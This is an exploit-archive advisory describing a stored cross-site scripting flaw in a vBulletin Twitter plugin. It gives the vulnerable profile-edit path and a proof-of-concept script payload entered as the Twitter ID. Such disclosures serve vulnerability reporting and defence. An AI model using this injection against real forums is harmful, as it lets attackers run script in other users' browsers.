Vbulletin plugin twitter Cross Site Scripting Vulnerability

2010-10-20 / 2010-10-21
Credit: Ajax Security Team
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-79

################################################### [+] Exploit Title: Vbulletin plugin twitter Cross Site Scripting Vulnerability [+] Author: Ajax Security Team [+] Version: vBulletin [ 3.8.4 - 3.8.5] [+] Tested on: vBulletin 3.8.5 plugin twitter ################################################## #######################[ Exploit ]#################### [ Exploit ] [ profile.php?do=editprofile ] Go To : Http://Target.com/patch/profile.php?do=editprofile And Make or Edit Twitter ID ==> <Script>Alert('Cair3x')</Script> [ / Exploit ] ###########################[ Exploit ]################# ################################################### BY : Cair3x [Cair3x.Support@Gmail.com] Web Site : Ajaxtm.com Forum : Http://Ajaxtm.com/forum/ [+] Greetz to All Ajaxtm Security Member HUrr!c4nE - black.shadowes - hadihadi - iM4n - irsdl - the-0utl4w - Expl0its - Mormoroth - Mikili - Black.Spook - S3Ri0uS - Zalatan - Net.Edit0r - Ciph3r - A.u.r.A ###################################################

References:

Http://Ajaxtm.com/forum/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top